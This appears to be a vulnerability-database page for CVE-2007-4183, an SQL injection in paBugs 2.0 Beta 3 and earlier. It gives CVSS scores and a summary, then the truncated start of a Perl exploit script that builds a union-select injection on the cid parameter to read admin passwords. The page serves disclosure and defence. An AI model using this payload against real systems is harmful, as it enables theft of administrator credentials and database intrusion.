7.5
CVSSv2

CVE-2007-4183

Published: 08/08/2007 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in main.php in paBugs 2.0 Beta 3 and previous versions allows remote malicious users to execute arbitrary SQL commands via the cid parameter to index.php.

Vulnerable Product Search on Vulmon Subscribe to Product

php arena pabugs

Exploits

#!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; if(@ARGV < 4) { usage(); exit(); } $host = $ARGV[0]; # Host $path = $ARGV[1]; # Path to paBugs directory $pref = $ARGV[2]; # prefix for admin tables $usid = $ARGV[3]; # user id $www = new LWP::UserAgent; $sql = "$host/$path/indexphp?cid=1'+union+select+1,2,3,password,5+from+$pref ...